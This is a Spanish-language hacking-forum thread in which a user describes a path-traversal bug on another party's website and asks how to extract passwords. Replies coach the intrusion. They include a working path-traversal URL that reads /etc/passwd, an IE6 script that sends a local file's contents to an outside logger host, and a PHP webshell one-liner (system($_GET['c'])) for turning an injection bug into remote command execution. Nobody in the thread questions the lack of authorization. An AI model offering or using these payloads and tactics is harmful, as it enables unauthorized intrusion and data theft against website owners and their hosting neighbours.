Tema destacado: Únete al Grupo Steam elhacker.NET
 Autor
|
Tema: Bug en una web me permite navegar por el server, solo lectura. (Leído 3,076 veces)
|
SeniorX
 Desconectado
Mensajes: 1.347
Programador Novato
|
Hola a todos... bueno esto no es lo mio  pero encontré en un bug por casualidad en una web... y bueno puedo entrar a varias de sus carpetas... fui a etc/passwd y abre perfectamente, pero eso no me sirve de nada, lo que necesito son passwords. En que carpeta podria encontrar informacion de ese El bug es algo como esto www.unaweb.com/inicio.html?pagina=./../../../../../../../etc/passwdSe puede sacar provecho con este tipo de bug? Se me ocurrio al instante ir algun config.php y ver la informacion pero no se llamaba con los nombres mas tipicos por lo tanto me quedé sin ideas XD. |
|
|
|
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
Crack_X
Anti-War
Ex-Staff
Desconectado
Mensajes: 2.320
Peace & Love
|
Intenta abrir un index.php o cualquier archivo php. Muestra el codigo fuente? En caso de que no lo muestre es un Remote File Inclusion y es lo que probablemente sea. Busca en el foro sobre eso que en el area de Documentacion creo que explicaron sobre este fallo.
|
|
|
|
|
En línea
|
|
|
|
oRTNZ
Desconectado
Mensajes: 808
no no soy malo... soy vicioso :p
|
hola, que tipo de web es asp,php,html,etc ? ,saludos
|
|
|
|
|
En línea
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
php... bueno gracias a google encontre una lista de phps de esa web y no muestra el codigo de fuente, sino que la pagina.php. No es remote file inclusion ya que yo no puedo introducir nada, lo que puedo hacer es navegar por el servidor, pero en ningun caso hacer algo como www.unaweb.com/inicio.html?pagina=laurldemishell nosí si me logro expresar correctamente. No puedo agregar nada, solo puedo mirar :S... Ya habia probado lo de los archivos php... pero no encontré nada  que más podria hacer? Ojalá que esté claro que solo me puedo mover por los archivos del servidor... incluyendo los de las otras webs alojadas en este. |
|
|
|
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
Crack_X
Anti-War
Ex-Staff
Desconectado
Mensajes: 2.320
Peace & Love
|
Da algun error al intentar añadir una web que no sea del mismo servidor?
|
|
|
|
|
En línea
|
|
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
Claro, me imagino que en el codigo deben haber especificado que es una carpeta del ftp. mira el error. Fatal error: Failed opening required '/home/httpd/laweb.cl/html/otracarpeta/plantillas/www.google.cl' (include_path='/home/httpd/laweb.cl/libcyc:/home/httpd/laweb.cl/libcyc/Preuni:/home/httpd/laweb.cl/libcyc/Colegios:/home/httpd/libcyc:/home/httpd/otraweb.cl/libcyc') in /home/httpd/web.cl/html/carpeta/plantillas/index.html on line 66 |
|
|
|
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
Crack_X
Anti-War
Ex-Staff
Desconectado
Mensajes: 2.320
Peace & Love
|
Al menos tienen la mitad de la seguridad  Pues solo podras leer archivos, ponte a buscar quizas encuentres algo interesante. |
|
|
|
|
En línea
|
|
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
Jajajaa, eso llevo haciendo algun tiempo... pero no me dedico mucho al tema, si alguien sabe si se puede encontrar algo importante seria interesante. Muchas gracias por responder men  . |
|
|
|
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
Se llama "Remote File Disclosure", existe en lado servidor, y lado cliente. en lado servidor, es lo que te permite hacer a ti. en lado cliente, te permite abrir un archivo del cliente. por ejemplo, en IExplorer 6.0 encontre una vulenrabilidad al usar: <script>
window.onerror = new function (){self.location="http://www.jaja.com/logger.php?cont="+escape(document.getElementsByTagName("script")[1].innerText)}
</script>
<script src="file://c:/autoexec.bat"></script>
esto te mandaba el contenido de autoexec.bat a tu pagina (obviamente tu obtendiras otro archivo, es un ejemplo xD), fue de los primeros bugs que descubri  . Bien.. de todas formas, como ya te dije alguna vez, si lograras encontrara un bug de XSS, en alguna pagina accesible desde /home/blabla/ podrias meter comandos como Remote Command Execution.. es un poco complicado, pero es posible. Lo de usar google para listar los php fue inteligente pero obviamente usa include "/home/"; por lo que no te permite ver contenido activo.. aunque es posible usarlo para ver información importante. Lo de config.php ni te esfuerses en buscarlo.. no se porque pero todos creen que si esta basado en sql debe haber un config... y no es verdad.. de hecho es peligroso que lo haya, al menos con ese nombre.. y si existiera, no lo podrias ver, porque los php no se ven, recuerdas? en fin.. Saludos!! |
|
|
|
|
En línea
|
|
|
|
SeniorX
Desconectado
Mensajes: 1.347
Programador Novato
|
mmm.... voy a ver si me sale con XSS, igual dejo una pregunta abierta:
¿No existe otra manera?
|
|
|
|
|
En línea
|
try {
live();
}
catch (ShitHappensException ex) {
MessageBox.Show(ex.Solution)
} Precaución: La programacion puede producir adiccion |
|
|
oRTNZ
Desconectado
Mensajes: 808
no no soy malo... soy vicioso :p
|
Bien.. de todas formas, como ya te dije alguna vez, si lograras encontrara un bug de XSS, en alguna pagina accesible desde /home/blabla/ podrias meter comandos como Remote Command Execution.. es un poco complicado, pero es posible.
donde puedo buscar info de lo que mencionas? he estado probando en webs y me sale Z:\Inetpub\wwwroot\oRTNZ\inetabc\abcd.xxx en un huevo de sitios y hasta donde té entendi va por ahi,digo? ojo no tiene foro  saludos
|
|
|
|
|
En línea
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
oRNTZ no entendi la pregunta, lo siento.
|
|
|
|
|
En línea
|
|
|
|
oRTNZ
Desconectado
Mensajes: 808
no no soy malo... soy vicioso :p
|
Bien.. de todas formas, como ya te dije alguna vez, si lograras encontrara un bug de XSS yo,yo lo he encontrado... en alguna pagina accesible desde /home/blabla/ seee yo yo.. y me sale como resultado pero en una infinidad de sitios Z:\Inetpub\wwwroot\oRTNZ\inetabc\abcd.xxx podrias meter comandos como Remote Command Execution.. es un poco complicado, pero es posible.
ahi va la pregunta seguro sabes "algo", donde puedo encontrar informacion? porque ahi si que estoy perdido. pd,saludos 
|
|
|
|
|
En línea
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
sirdarckcat
Troll Buena Onda y
CoAdmin
Desconectado
Mensajes: 6.947
Lavando Platos
|
informacion de remote comand execution... eso es en este caso la capacidad de meter codigo PHP.. si sabes PHP solo mete uno de los famosos "webshells" o un simple system($_GET['c']); el bug XSS entra, cuando en lugar de meter un <script> o algo por el estilo, metes <?php system($_GET['c']);?> Saludos!! |
|
|
|
|
En línea
|
|
|
|
oRTNZ
Desconectado
Mensajes: 808
no no soy malo... soy vicioso :p
|
|
|
|
|
|
En línea
|
(31 del 12 de 2005) un dia que recuerdo siempre! :p
(03 del 08 de 2006) otro dia que lo recordare siempre...
Si eres Peruano, QUEDATE y si quieres ser de segunda mano del pais que fueras, pues LARGATE Y NO REGRESES...
|
|
|
|
 |
, por eso mi duda 
, 
